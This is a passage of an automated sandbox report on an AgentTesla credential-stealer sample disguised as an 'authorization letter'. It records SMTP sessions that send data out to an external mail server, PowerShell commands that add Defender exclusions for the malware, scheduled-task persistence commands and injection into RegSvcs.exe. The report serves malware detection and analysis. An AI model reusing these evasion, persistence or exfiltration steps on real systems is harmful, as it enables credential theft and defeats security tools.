Sep 26, 2024 07:03:14.516266108 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:14.516287088 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:14.521111012 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:14.521121979 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:14.521246910 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:14.521255970 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:14.805124044 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:14.847150087 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:18.278861046 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:18.283873081 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:18.283981085 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:18.387343884 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:18.941123009 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:18.941585064 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:18.946443081 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:19.111865997 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:19.112166882 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:19.117064953 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:19.276999950 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:19.277544022 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:19.282440901 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:19.459836960 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:19.460290909 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:19.465195894 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:19.682753086 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:19.682991028 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:19.687942028 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:19.995276928 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:19.995573997 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:20.000436068 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:20.150343895 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:20.151192904 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:20.151371956 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:20.151406050 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:20.151431084 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:20.156122923 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:20.156244040 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:20.156296015 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:20.156367064 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:20.422688961 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:20.472306967 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:04:58.285280943 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:04:58.290091038 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:04:58.651185989 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:04:58.651284933 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:04:58.651356936 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:04:58.651549101 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:04:58.656380892 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5
UDP packets:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 07:03:12.011574984 CEST | 60297 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 07:03:12.368562937 CEST | 53 | 60297 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 26, 2024 07:03:12.011574984 CEST | 192.168.2.5 | 1.1.1.1 | 0x38e5 | Standard query (0) | mail.unitechautomations.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 26, 2024 07:03:12.368562937 CEST | 1.1.1.1 | 192.168.2.5 | 0x38e5 | No error (0) | mail.unitechautomations.com | (none) | 192.185.129.60 | A (IP address) | IN (0x0001) | false
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Sep 26, 2024 07:03:13.070116997 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5 | 220-cp-ht-2.webhostbox.net ESMTP Exim 4.96.2 #2 Thu, 26 Sep 2024 10:33:12 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Sep 26, 2024 07:03:13.071027040 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60 | EHLO 878411
Sep 26, 2024 07:03:13.247092009 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5 | 250-cp-ht-2.webhostbox.net Hello 878411 [8.46.123.33]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Sep 26, 2024 07:03:13.248347998 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60 | AUTH login ZGVzaWduQHVuaXRlY2hhdXRvbWF0aW9ucy5jb20=
Sep 26, 2024 07:03:13.414484978 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5 | 334 UGFzc3dvcmQ6
Sep 26, 2024 07:03:13.787029982 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5 | 235 Authentication succeeded
Sep 26, 2024 07:03:13.787302017 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60 | MAIL FROM:<design@unitechautomations.com>
Sep 26, 2024 07:03:13.962662935 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5 | 250 OK
Sep 26, 2024 07:03:13.962903023 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60 | RCPT TO:<overseas1@vestalshipping.com.vn>
Sep 26, 2024 07:03:14.343059063 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5 | 250 Accepted
Sep 26, 2024 07:03:14.343246937 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60 | DATA
Sep 26, 2024 07:03:14.515552998 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
Sep 26, 2024 07:03:14.516287088 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60 | .
Sep 26, 2024 07:03:14.805124044 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5 | 250 OK id=1stgeo-000KNK-1N
Sep 26, 2024 07:03:18.941123009 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5 | 220-cp-ht-2.webhostbox.net ESMTP Exim 4.96.2 #2 Thu, 26 Sep 2024 10:33:18 +0530
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Sep 26, 2024 07:03:18.941585064 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60 | EHLO 878411
Sep 26, 2024 07:03:19.111865997 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5 | 250-cp-ht-2.webhostbox.net Hello 878411 [8.46.123.33]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Sep 26, 2024 07:03:19.112166882 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60 | AUTH login ZGVzaWduQHVuaXRlY2hhdXRvbWF0aW9ucy5jb20=
Sep 26, 2024 07:03:19.276999950 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5 | 334 UGFzc3dvcmQ6
Sep 26, 2024 07:03:19.459836960 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5 | 235 Authentication succeeded
Sep 26, 2024 07:03:19.460290909 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60 | MAIL FROM:<design@unitechautomations.com>
Sep 26, 2024 07:03:19.682753086 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5 | 250 OK
Sep 26, 2024 07:03:19.682991028 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60 | RCPT TO:<overseas1@vestalshipping.com.vn>
Sep 26, 2024 07:03:19.995276928 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5 | 250 Accepted
Sep 26, 2024 07:03:19.995573997 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60 | DATA
Sep 26, 2024 07:03:20.150343895 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
Sep 26, 2024 07:03:20.151431084 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60 | .
Sep 26, 2024 07:03:20.422688961 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5 | 250 OK id=1stgeu-000KZI-0E
Sep 26, 2024 07:04:58.285280943 CEST | 49712 | 587 | 192.168.2.5 | 192.185.129.60 | QUIT
Sep 26, 2024 07:04:58.651185989 CEST | 587 | 49712 | 192.185.129.60 | 192.168.2.5 | 221 cp-ht-2.webhostbox.net closing connection

                                                                Target ID:1
                                                                Start time:01:03:04
                                                                Start date:26/09/2024
                                                                Path:C:\Users\user\Desktop\autorization Letter.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\autorization Letter.exe"
                                                                Imagebase:0xe40000
                                                                File size:841'224 bytes
                                                                MD5 hash:457F6CB01C6F3F7922AC201F70111AE5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.2160081111.0000000004429000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:01:03:08
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe"
                                                                Imagebase:0xb0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:01:03:08
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:5
                                                                Start time:01:03:08
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe"
                                                                Imagebase:0xb0000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:6
                                                                Start time:01:03:08
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:7
                                                                Start time:01:03:08
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp"
                                                                Imagebase:0x190000
                                                                File size:187'904 bytes
                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:8
                                                                Start time:01:03:08
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:01:03:09
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                Imagebase:0x610000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2202666103.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2204151615.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2204151615.0000000002882000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2204151615.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2204151615.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:10
                                                                Start time:01:03:09
                                                                Start date:26/09/2024
                                                                Path:C:\Users\user\AppData\Roaming\tIFjYTCo.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\AppData\Roaming\tIFjYTCo.exe
                                                                Imagebase:0x1b0000
                                                                File size:841'224 bytes
                                                                MD5 hash:457F6CB01C6F3F7922AC201F70111AE5
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 58%, ReversingLabs
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:11
                                                                Start time:01:03:11
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                Imagebase:0x7ff6ef0c0000
                                                                File size:496'640 bytes
                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:01:03:15
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp"
                                                                Imagebase:0x190000
                                                                File size:187'904 bytes
                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:13
                                                                Start time:01:03:15
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:01:03:15
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                Imagebase:0x540000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3346316308.0000000002899000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3346316308.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3346316308.000000000282C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3346316308.000000000282C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:16
                                                                Start time:01:03:20
                                                                Start date:26/09/2024
                                                                Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                                                Imagebase:0x900000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Antivirus matches:
                                                                • Detection: 0%, ReversingLabs
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:17
                                                                Start time:01:03:20
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:18
                                                                Start time:01:03:28
                                                                Start date:26/09/2024
                                                                Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                                                Imagebase:0x5c0000
                                                                File size:45'984 bytes
                                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Target ID:19
                                                                Start time:01:03:28
                                                                Start date:26/09/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff6d64d0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true


                                                                  Execution Graph

                                                                  Execution Coverage:11%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:195
                                                                  Total number of Limit Nodes:17

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 016BD4F6
                                                                  • GetCurrentThread.KERNEL32 ref: 016BD533
                                                                  • GetCurrentProcess.KERNEL32 ref: 016BD570
                                                                  • GetCurrentThreadId.KERNEL32 ref: 016BD5C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: ae2045cf7c56e5f01f685c3d9205a4b13d77054534c52c67443612c764fdf0c9
                                                                  • Instruction ID: 907aab05030d866db52570d6fc779efe5686c8339f79226c10de484fe69781e1
                                                                  • Opcode Fuzzy Hash: ae2045cf7c56e5f01f685c3d9205a4b13d77054534c52c67443612c764fdf0c9
                                                                  • Instruction Fuzzy Hash: 965159B09012498FDB54DFA9D988BEEBBF1FF88308F248459D009A7360D7399984CF65

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32 ref: 016BD4F6
                                                                  • GetCurrentThread.KERNEL32 ref: 016BD533
                                                                  • GetCurrentProcess.KERNEL32 ref: 016BD570
                                                                  • GetCurrentThreadId.KERNEL32 ref: 016BD5C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ProcessThread
                                                                  • String ID:
                                                                  • API String ID: 2063062207-0
                                                                  • Opcode ID: f06ff9eaf7d677f52a7e14f13d025ec7c1e68fcfd3b5819596aa02e0a3e890ec
                                                                  • Instruction ID: d82bce0ecd31db135f51f0ebcc5ccd18d58d5dde1a817f43c96d39c62722f474
                                                                  • Opcode Fuzzy Hash: f06ff9eaf7d677f52a7e14f13d025ec7c1e68fcfd3b5819596aa02e0a3e890ec
                                                                  • Instruction Fuzzy Hash: FE516AB09002098FDB58DFA9D988BEEBBF1FF88308F208459D109A7360D7359984CF65

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $
                                                                  • API String ID: 0-227171996
                                                                  • Opcode ID: d5fd5bf8601c6d45c1648d82d7cdabdb4f95c125e40484774ea4566d53bd79c0
                                                                  • Instruction ID: 7b5c640410e4afa9a0f305a46f91ba10948b5896c8b240cd2f9a94ebfb0be38d
                                                                  • Opcode Fuzzy Hash: d5fd5bf8601c6d45c1648d82d7cdabdb4f95c125e40484774ea4566d53bd79c0
                                                                  • Instruction Fuzzy Hash: F471C431920701CFEB04EF29D4859457BF1FF89304B4586A8D949AB32AEB71F8D4CB90

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $
                                                                  • API String ID: 0-227171996
                                                                  • Opcode ID: e883533ba312f367dc9e0fea27c6c4c85da377dc6531b61e2c0d26440cbd083e
                                                                  • Instruction ID: 9e53a7e4e055852b139aa2e5d284e07ef32b00c8f3b20c3f5246acac7c91a094
                                                                  • Opcode Fuzzy Hash: e883533ba312f367dc9e0fea27c6c4c85da377dc6531b61e2c0d26440cbd083e
                                                                  • Instruction Fuzzy Hash: C961B431920701CFEB04EF29D4859557BF1FF89304B4586A8D949AB32AEB71F9D4CB90

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q${ m^
                                                                  • API String ID: 0-4065714871
                                                                  • Opcode ID: 84e3d0ccc61cadd517b7e2b24fa1e8c6d8b7c419c26edd72f96a1275c53ae946
                                                                  • Instruction ID: 43a343df527099b5b185b6baa148f701a860893b3737d207f2fedc2ae44e75c6
                                                                  • Opcode Fuzzy Hash: 84e3d0ccc61cadd517b7e2b24fa1e8c6d8b7c419c26edd72f96a1275c53ae946
                                                                  • Instruction Fuzzy Hash: 1321B471A002068FDB05DFB8D9519EE7FBAFF85300F4045A5C541AB264DF759D09CBA2

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4']q${ m^
                                                                  • API String ID: 0-4065714871
                                                                  • Opcode ID: 9563dd4e5aa20b98cc21af301df74502f64ea537801ff4ccd298965c4484f5b8
                                                                  • Instruction ID: 56051fe6a8bcb43dc4db374fb4f71c39c808736991254158ba7debe9472c591f
                                                                  • Opcode Fuzzy Hash: 9563dd4e5aa20b98cc21af301df74502f64ea537801ff4ccd298965c4484f5b8
                                                                  • Instruction Fuzzy Hash: 23114570E0010A9FDB05EFB8D9519EE7BBAFF84304F404565C501AB264EF75AD49CBA2

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079309F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 15f7caaf1d2460b723114380d5b25f56ae2baa9fa5af1bf173c6a1f2ffdc33cc
                                                                  • Instruction ID: 5045f1c77a4775a7cd3bac80aac6ee29ac547728014426a4db90206057f63951
